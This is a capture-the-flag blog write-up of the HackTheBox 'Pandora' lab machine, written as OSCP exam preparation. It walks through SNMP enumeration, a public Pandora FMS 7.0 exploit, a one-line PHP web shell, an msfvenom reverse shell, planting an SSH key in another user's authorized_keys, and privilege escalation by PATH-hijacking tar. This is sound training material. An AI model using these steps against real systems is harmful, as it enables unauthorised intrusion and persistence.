OSCP PREP BOX 9: HtB Pandora

Written By Ryan Daly

Pandora

We are back with another HtB machine. Today we’re taking on Pandora, which is listed as an easy box, but the user ratings definitely lean more towards medium..

So, to start off, we’re going to run nmap and see what we’re working with.



As per usual, we have port 80 and 20 open. Neither service seems outdated, so let’s just head right over to the webserver.

Nothing too crazy off the bat, we do have a contact form which seems interesting, but just in the interest of multitasking, I ran a gobuster directory bruteforce and ffuf dns bruteforce in the background while we look around.

Not too much to work with here. The contact form wasn’t giving me much to go off of, so I ended up going back to nmap to see if maybe we missed a port due to firewall and also to check out UDP ports.

And of course we do have a UDP port open.. I really have to start doing udp scans off the bat.. wasting time!

Alright, let’s start off footprinting the service. Most of the techniques I used were covered in the HtB CPTS path.

We do get some information running snmpwalk off the bat:

Take that over to SSH and we’re in!

Looking at it briefly, we see that the home directory has two users, Daniel and Matt. Matt’s account has the user.txt file, so we have to find a way to move laterally.

What I noticed first is that we actually have  a webserver being hosted on the internal network. I tried curling via http://localhost/pandora_console/ but the output was a bit unwieldy. So instead I just decided to do a very simple SSH port forward.

Now I just navigated to firefox and went to http://localhost:1234/pandora_console/ and now we have access to the pandora FMS page

I tried logging in as admin with default creds with no success. I then tried Daniel’s creds but that also failed and gave a different message saying “API use only.” I googled that which basically just means Daniel can only curl pandora_console. I went to Pandora’s documentation and found out I can curl the version via “curl http://console_IP/pandora_console/include/api.php?info=version

So we see our version is 7.0. I Google’d exploits for version 7.0 and immediately got results. I had trouble with the main exploit, but was able to get some progress with this github PoC: https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated

I created a very simple php shell: echo '<?php system($_REQUEST['cmd']); ?>' > shell.php

Now we’re the user Matt! Let’s get our user flag.

So our command shell right now is just a simple RCE, but we’re going to need to elevate that. So let’s do what we’ve done previously and put a reverse shell script in the /tmp directory and see if we can get this cmd prompt to execute. This did end up working for me, but /tmp didn’t work so I had to put it in /dev/shm/. But any directory we can control will work fine. So, just to recap, we used msfvenom to craft a shell.sh script. We uploaded that to /dev/shm/. We gave it execute permissions. Then we used our CMD prompt to execute the shell by using its absolute path: /dev/shm/shell.sh

As I began doing my usual priv esc checks, I noticed an interesting SUID binary. The annoying thing is that the shell that we’re using is unable to process sudo commands. We can confirm that when we try to run sudo -l. So our goal now shifts to trying to find another way to get into matt’s account.

Taking a look at his home directory we can see he has .ssh and we have read, write, and execute permissions over his authorized keys file. That is great. So all we have to do is generate a public key on our kali box, append our key to matt’s authorized keys file, and then ssh to matt.

To walk through the steps of that, on our kali box we’d do:

Ssh-keygen -t ed25519 -C “<random words>”

Save the file in the default location

Leave password blank.

cat ~/.ssh/id_ed25519.pub

Copy that value

Now on the shell we have for matt, we’re going to run:

Echo “<the copied value>” >> authorized_keys

Now we can SSH by running:

ssh -i ~/.ssh/id_ed25519 matt@10.10.11.136

Allllright. That was a slightly devious detour towards our privilege escalation.. But! We can see that it does indeed work as confirmed by the fact that sudo -l prompts for a password now.

So, let’s try poking into the SUID we have which is /usr/bin/pandora_backup

I tried running it and it spits out  a HUGE output which is basically just backing up the entire pandora file system. To get some more information about what this is actually doing, we can run the ltrace command. Ltrace tracks calls to functions in shared libraries (like libc) that a program uses and shows the arguments passed to those functions, as well as the return values. It’s a great way to debug programs. So lets see what this binary is doing:



So we can see from this that it’s using the tar command but it never establishes the absolute path of tar.. which means that we can set our environment variable to create our own path to a malicious tar binary that runs a bash shell when executed as root! So let’s dig in.

I ran this from /dev/shm since that is a directory we have complete control of.

So to start, we’re going to set /dev/shm to matt’s PATH.

We can do that with “export PATH=/dev/shm:$PATH”

Now let’s create our malicious tar binary.

I created a very simple bash file:

Now all that’s left is to run /usr/bin/pandora_backup!

We are root!

All in all, a fun box with a lot of diversity.

 

 

 

Ryan Daly
Previous

OSCP PREP BOX 10: HtB Forest
Next

OSCP PREP BOX 8: HtB Editorial